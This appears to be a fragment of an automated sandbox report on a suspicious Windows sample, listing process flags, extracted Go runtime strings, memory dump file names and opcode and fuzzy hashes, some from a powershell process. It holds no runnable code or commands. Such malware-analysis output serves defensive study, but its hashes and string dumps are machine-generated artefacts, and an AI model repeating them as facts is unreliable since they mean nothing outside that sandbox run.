                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Reset < >
                                      Strings
                                      • ) @s Pn=][}]i)> +)(tvrRuUeEaAlLsSbBoOxX+-nNiIfFpP+a-a25\fALAKAZARCACOCTDEFLGAHIINIAKSKYLAMEMDMAMIMNMSMOMTNENVNHNJNMNYNCNDOHOKORPARISCSDTNTXUTVTVAWAWVWIWYAEAAAPADAFAGAIAOAQASATAUAWAXBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBTBVBWBYBZCCCDCFCGCHCICKCLCMCNCRCUCVCWCX, xrefs: 0007BABC
                                      • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!atlas: the image is already allocated2220446049250313080847263336181640625H, xrefs: 0007BBE8
                                      • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg,, xrefs: 0007BBB4
                                      • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 0007BAFE
                                      • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg, Volgogradapplication/x-bytecode.elisp (compi, xrefs: 0007BB59
                                      • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)FillRule(%d)GetCursorPosleftshoulderrighttrigger15258789, xrefs: 0007BAD7
                                      • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=gamepad: IDirectInputDevice8::Acquire failed: %wgraphicscommand: a screen image cannot be dumpedstrconv: illegal App, xrefs: 0007BB8D
                                      • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timergamepaddb: unexpected platform: %s3552713678800500929355621337890625Venezuela (Bolivarian , xrefs: 0007BB32
                                      • %, xrefs: 0007BBF1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1466900294.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                      • Associated: 00000000.00000002.1466862578.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1467618676.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1467618676.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468750552.00000000011A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468771062.00000000011A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468787806.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468808035.00000000011AB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468828997.00000000011AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468849235.00000000011AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468906619.0000000001210000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468928007.0000000001212000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468949893.0000000001214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1468979100.000000000121D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469005720.000000000121E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469026831.0000000001220000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469045041.0000000001221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469045041.000000000122C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469045041.0000000001264000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469045041.0000000001269000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469137766.000000000126D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469155895.000000000126E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469155895.00000000012B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1469155895.00000000012C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_40000_BwqqVoHR71.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %$) @s Pn=][}]i)> +)(tvrRuUeEaAlLsSbBoOxX+-nNiIfFpP+a-a25\fALAKAZARCACOCTDEFLGAHIINIAKSKYLAMEMDMAMIMNMSMOMTNENVNHNJNMNYNCNDOHOKORPARISCSDTNTXUTVTVAWAWVWIWYAEAAAPADAFAGAIAOAQASATAUAWAXBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBTBVBWBYBZCCCDCFCGCHCICKCLCMCNCRCUCVCWCX$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=gamepad: IDirectInputDevice8::Acquire failed: %wgraphicscommand: a screen image cannot be dumpedstrconv: illegal App$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timergamepaddb: unexpected platform: %s3552713678800500929355621337890625Venezuela (Bolivarian $bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)FillRule(%d)GetCursorPosleftshoulderrighttrigger15258789$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg,$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!atlas: the image is already allocated2220446049250313080847263336181640625H$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg, Volgogradapplication/x-bytecode.elisp (compi$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
                                      • API String ID: 0-290768958
                                      • Opcode ID: fdd47b0b124b66337a7abae4947a2f0bee31cea5aae44e96c7d01d87c62a8460
                                      • Instruction ID: 2a5749a6528dd89707c109e4d801d00d69fe333c58ea4524cfca0a17dbb1afaa
                                      • Opcode Fuzzy Hash: fdd47b0b124b66337a7abae4947a2f0bee31cea5aae44e96c7d01d87c62a8460
                                      • Instruction Fuzzy Hash: 2F91CEB45087018FD390FF68D09579ABBE4BF89708F00896CE5D887392DB79A948CF52
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aedc34e542f6d5ecabe7bd445826de1a693570402911a0c554cda5f10310e6d2
                                      • Instruction ID: f7cc233636bf4ef2eb9e52703aade0420edf582148d53a5c07abf2e5ad5d178d
                                      • Opcode Fuzzy Hash: aedc34e542f6d5ecabe7bd445826de1a693570402911a0c554cda5f10310e6d2
                                      • Instruction Fuzzy Hash: E4214A34B001189FDB08DFA8D5849ADFBF2FF88210B258199E815AB761CB35EC46CF94
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b957df4d936554d28e0b905995bc309d5a48f034216e9ffd3c57fd8f033e30af
                                      • Instruction ID: 0d99be7ef98a74c983b9678ee492dcb55c5a089e48f139f27f493a06ad566f98
                                      • Opcode Fuzzy Hash: b957df4d936554d28e0b905995bc309d5a48f034216e9ffd3c57fd8f033e30af
                                      • Instruction Fuzzy Hash: 97A17E35A052559FCB05CFA8D880AAEBBF2FF89310B1584A9E445EB361C735EC46CF90
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66983ce6274a93f208a5257e710a6ed9145cd09e7700abd6c8798e31facbdb4e
                                      • Instruction ID: 2f7a5c6e9200a67db6095e910ea6ecd6c8d1a51329ac1fcfda3e98b6ddc509b2
                                      • Opcode Fuzzy Hash: 66983ce6274a93f208a5257e710a6ed9145cd09e7700abd6c8798e31facbdb4e
                                      • Instruction Fuzzy Hash: E8918E70A046068FCB45CF58C4A4AAEFBB5FF49310B248599D915EB3A1C736ED51CFA0
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c59a6a2b2d24a48f42d2ecc6b35417b799fe7c6cdb4db1cd9613f98ec5f02ae
                                      • Instruction ID: 68d6267f7719f750959f220f379f625ec73c92fd656e7b53b4ab47796d801229
                                      • Opcode Fuzzy Hash: 1c59a6a2b2d24a48f42d2ecc6b35417b799fe7c6cdb4db1cd9613f98ec5f02ae
                                      • Instruction Fuzzy Hash: 0F414974A0061A8FCB49CF58C0A4AAEF7B5FF48310B118569D905AB364C732FE91CF90
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 359eeaeaf14c41a16e82fd4da8c5e7762531c1828e4fe5e8c8b6844de55ceaa8
                                      • Instruction ID: a781f762766ecded6b69c25d0edf7be9426297c404b7bb7d258757e18980fab3
                                      • Opcode Fuzzy Hash: 359eeaeaf14c41a16e82fd4da8c5e7762531c1828e4fe5e8c8b6844de55ceaa8
                                      • Instruction Fuzzy Hash: 7F11E238A005189FDB04DFA9D68499DFBF2FF88311F2981A9E804A7711C735AD81CF90